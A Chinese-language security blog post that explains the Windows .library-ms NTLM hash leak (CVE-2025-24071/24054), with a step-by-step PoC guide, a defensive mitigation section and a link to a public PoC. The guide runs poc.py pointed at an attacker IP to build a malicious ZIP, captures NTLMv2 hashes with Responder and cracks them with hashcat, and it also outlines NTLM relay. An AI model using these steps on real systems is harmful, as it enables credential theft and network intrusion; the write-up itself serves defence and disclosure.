关于 CVE-2025-24071(已更新为 CVE-2025-24054)的漏洞深度解析与 PoC 利用指南
一、漏洞核心原理与机制
漏洞成因
Windows 资源管理器在处理包含恶意 .library-ms 文件的压缩包(RAR/ZIP)时,会自动解析文件内容并触发隐式 SMB 连接。
文件格式缺陷:.library-ms 是基于 XML 的库文件,用于定义网络路径搜索规则。攻击者可构造包含 \\<攻击者IP>\shared 的路径标签,嵌入压缩包中。
自动解析机制:解压时,资源管理器和索引服务(如 SearchProtocolHost.exe)会主动读取文件元数据,尝试连接攻击者指定的 SMB 服务器,触发 NTLMv2 认证握手。
无需用户交互
仅需解压文件(无需双击或预览),系统即自动发起 SMB 请求,导致 NTLMv2 哈希泄露。
二、漏洞影响范围与危害
受影响系统
Windows 客户端:Windows 10/11(21H2、22H2、23H2、24H2 等)。
Windows 服务器:Server 2012 R2、2016、2019、2022、2025(包括 Server Core 版本)。
攻击场景
横向移动:捕获的哈希可用于中继攻击(NTLM Relay)或暴力破解,渗透内网。
黑市价值:普通用户哈希价值约 1-10 美元,域管理员哈希可达数万美元。
三、PoC 利用与复现步骤
工具准备
攻击机:Kali Linux(安装 Responder 工具)
目标机:未打补丁的 Windows 系统
PoC 脚本:GitHub 仓库 提供的 poc.py。
生成恶意压缩包
运行脚本生成包含恶意 .library-ms 的 ZIP 文件:
python poc.py
Enter your file name: exploit
Enter IP: <攻击机IP>
生成的 exploit.zip 包含指向攻击机 SMB 共享的 XML 配置。
触发漏洞与捕获哈希
在攻击机启动 Responder 监听:
sudo responder -I eth0 -wvF
将 exploit.zip 传输至目标机并解压,观察 Responder 捕获的 NTLMv2 哈希。
哈希破解示例
使用 Hashcat 暴力破解:
hashcat -m 5600 captured_hash.txt wordlist.txt --force
8 位纯数字密码可在数秒内破解,12 位混合密码需数小时。
四、防御与缓解措施
官方补丁
安装 2025 年 3 月及之后的 Windows 累积更新(如 KB5053606)。
网络层防护
阻断出站 SMB 流量:防火墙禁止 TCP 445 端口出站。
禁用 IPv6:部分攻击利用 IPv6 协议渗透,需关闭非必要协议。
用户行为规范
避免解压不明来源压缩包,优先使用 7-Zip 等第三方工具查看内容(不触发自动解析)。
强制使用长密码策略(如 16 位混合字符)降低哈希破解成功率。
五、时间线与更新
2025-03-18:漏洞细节与 PoC 公开。
2025-03-25:微软更新漏洞编号为 CVE-2025-24054[^更新说明]。
2025-05-07:在野利用确认,威胁组织 "Krypt0n" 售卖漏洞利用工具。
六、扩展研究(技术深挖)
流量分析
Wireshark 捕获显示,解压操作触发 SMB2 Negotiate Protocol Request 和 NTLMSSP_AUTH 数据包,明确暴露认证流程。
横向攻击手法
NTLM 中继:将哈希中继至 LDAP/EWS 服务,提升权限或窃取数据。
强制认证触发:结合 PrinterBug 或 PetitPotam 漏洞扩大攻击面。
总结
CVE-2025-24054 暴露了 Windows 文件解析机制的深层信任问题。企业需结合补丁管理、网络隔离与用户教育构建防御体系,同时关注哈希中继等衍生风险。安全研究人员可通过分析流量特征(如自动触发的 SearchProtocolHost.exe 进程)检测潜在攻击。
注:本文所有技术细节仅限防御研究,严禁用于非法攻击。漏洞编号以微软最新公告为准。
poc:
https://github.com/0x6rss/CVE-2025-24071_PoC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论